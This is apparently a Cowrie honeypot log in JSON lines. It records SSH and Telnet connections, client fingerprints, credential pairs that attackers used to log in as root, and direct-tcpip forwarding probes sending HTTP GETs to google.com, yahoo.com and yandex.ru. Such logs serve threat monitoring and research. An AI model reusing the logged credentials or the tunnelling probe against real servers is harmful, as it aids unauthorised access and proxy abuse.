{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T06:29:40.140391Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.039527Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":29078,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:29078","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.085649Z","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.130755Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":22003,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:22003","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.262867Z","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.307499Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":24105,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:24105","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.438876Z","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.483618Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"185.246.128.133","src_port":6976,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:6976","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.614894Z","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.659537Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"77.88.44.55","dst_port":80,"src_ip":"185.246.128.133","src_port":3091,"message":"direct-tcp connection request to 77.88.44.55:80 from 127.0.0.1:3091","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.791025Z","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"77.88.44.55","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 77.88.44.55:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.836058Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"185.246.128.133","src_port":22812,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22812","sensor":"my-vps","timestamp":"2025-08-26T06:29:41.967093Z","session":"bad77d334053"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T06:29:42.013240Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:29:42.058650Z","src_ip":"185.246.128.133","session":"bad77d334053"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":42310,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bf9d61e8fbf","protocol":"ssh","message":"New connection: 45.88.8.215:42310 (1.2.3.4:22) [session: 9bf9d61e8fbf]","sensor":"my-vps","timestamp":"2025-08-26T06:31:06.585370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:31:07.038585Z","src_ip":"45.88.8.215","session":"9bf9d61e8fbf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:31:07.040361Z","src_ip":"45.88.8.215","session":"9bf9d61e8fbf"}
{"eventid":"cowrie.login.success","username":"root","password":"Kunwar@123","message":"login attempt [root/Kunwar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:31:09.019090Z","src_ip":"45.88.8.215","session":"9bf9d61e8fbf"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:31:09.683764Z","src_ip":"45.88.8.215","session":"9bf9d61e8fbf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60114,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ffa7e6c8d02","protocol":"ssh","message":"New connection: 212.227.235.229:60114 (1.2.3.4:22) [session: 8ffa7e6c8d02]","sensor":"my-vps","timestamp":"2025-08-26T06:31:17.353485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:31:17.772126Z","src_ip":"212.227.235.229","session":"8ffa7e6c8d02"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:31:17.773029Z","src_ip":"212.227.235.229","session":"8ffa7e6c8d02"}
{"eventid":"cowrie.login.success","username":"root","password":"ganeshji","message":"login attempt [root/ganeshji] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:31:21.853702Z","src_ip":"212.227.235.229","session":"8ffa7e6c8d02"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:31:23.083522Z","src_ip":"212.227.235.229","session":"8ffa7e6c8d02"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64296,"dst_ip":"1.2.3.4","dst_port":22,"session":"f849044df814","protocol":"ssh","message":"New connection: 217.72.205.35:64296 (1.2.3.4:22) [session: f849044df814]","sensor":"my-vps","timestamp":"2025-08-26T06:32:41.907929Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:32:41.909195Z","src_ip":"217.72.205.35","session":"f849044df814"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54806,"dst_ip":"1.2.3.4","dst_port":22,"session":"773b1624d062","protocol":"ssh","message":"New connection: 212.227.235.229:54806 (1.2.3.4:22) [session: 773b1624d062]","sensor":"my-vps","timestamp":"2025-08-26T06:32:47.836507Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:32:49.688253Z","src_ip":"212.227.235.229","session":"773b1624d062"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:32:49.688929Z","src_ip":"212.227.235.229","session":"773b1624d062"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41167,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab1ad1a0e066","protocol":"telnet","message":"New connection: 212.227.125.160:41167 (1.2.3.4:23) [session: ab1ad1a0e066]","sensor":"my-vps","timestamp":"2025-08-26T06:33:16.743498Z"}
{"eventid":"cowrie.session.closed","duration":32.723479986190796,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:33:49.466907Z","src_ip":"212.227.125.160","session":"ab1ad1a0e066"}
{"eventid":"cowrie.session.closed","duration":"302.2","message":"Connection lost after 302.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:33:57.846976Z","src_ip":"212.227.235.229","session":"6b23f3665c84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50545,"dst_ip":"1.2.3.4","dst_port":22,"session":"adc843248d0b","protocol":"ssh","message":"New connection: 212.227.235.229:50545 (1.2.3.4:22) [session: adc843248d0b]","sensor":"my-vps","timestamp":"2025-08-26T06:34:01.123870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:34:01.125185Z","src_ip":"212.227.235.229","session":"adc843248d0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:34:04.008965Z","src_ip":"212.227.235.229","session":"adc843248d0b"}
{"eventid":"cowrie.session.connect","src_ip":"120.79.98.154","src_port":58822,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cb11e0a5602","protocol":"ssh","message":"New connection: 120.79.98.154:58822 (1.2.3.4:22) [session: 2cb11e0a5602]","sensor":"my-vps","timestamp":"2025-08-26T06:34:06.572511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:34:06.573358Z","src_ip":"120.79.98.154","session":"2cb11e0a5602"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T06:34:12.070547Z","src_ip":"120.79.98.154","session":"2cb11e0a5602"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:34:14.573422Z","src_ip":"120.79.98.154","session":"2cb11e0a5602"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:34:47.844345Z","src_ip":"212.227.235.229","session":"773b1624d062"}
{"eventid":"cowrie.session.closed","duration":"108.6","message":"Connection lost after 108.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:35:49.715638Z","src_ip":"212.227.235.229","session":"adc843248d0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42595,"dst_ip":"1.2.3.4","dst_port":22,"session":"eff8837ad9c8","protocol":"ssh","message":"New connection: 212.227.235.229:42595 (1.2.3.4:22) [session: eff8837ad9c8]","sensor":"my-vps","timestamp":"2025-08-26T06:37:51.323454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:37:51.324206Z","src_ip":"212.227.235.229","session":"eff8837ad9c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:37:51.711830Z","src_ip":"212.227.235.229","session":"eff8837ad9c8"}
{"eventid":"cowrie.session.closed","duration":"23.6","message":"Connection lost after 23.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:38:14.953331Z","src_ip":"212.227.235.229","session":"eff8837ad9c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50067,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a3fb126ba1d","protocol":"ssh","message":"New connection: 212.227.235.229:50067 (1.2.3.4:22) [session: 2a3fb126ba1d]","sensor":"my-vps","timestamp":"2025-08-26T06:38:15.443934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:38:15.444917Z","src_ip":"212.227.235.229","session":"2a3fb126ba1d"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:38:18.591275Z","src_ip":"212.227.235.229","session":"2a3fb126ba1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36692,"dst_ip":"1.2.3.4","dst_port":22,"session":"6533c1cc4b8c","protocol":"ssh","message":"New connection: 212.227.235.229:36692 (1.2.3.4:22) [session: 6533c1cc4b8c]","sensor":"my-vps","timestamp":"2025-08-26T06:38:33.968370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:38:34.713741Z","src_ip":"212.227.235.229","session":"6533c1cc4b8c"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T06:38:35.216231Z","src_ip":"212.227.235.229","session":"6533c1cc4b8c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:38:36.813601Z","src_ip":"212.227.235.229","session":"6533c1cc4b8c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37838,"dst_ip":"1.2.3.4","dst_port":22,"session":"52ad56d81823","protocol":"ssh","message":"New connection: 212.227.235.229:37838 (1.2.3.4:22) [session: 52ad56d81823]","sensor":"my-vps","timestamp":"2025-08-26T06:39:08.488296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:39:08.489379Z","src_ip":"212.227.235.229","session":"52ad56d81823"}
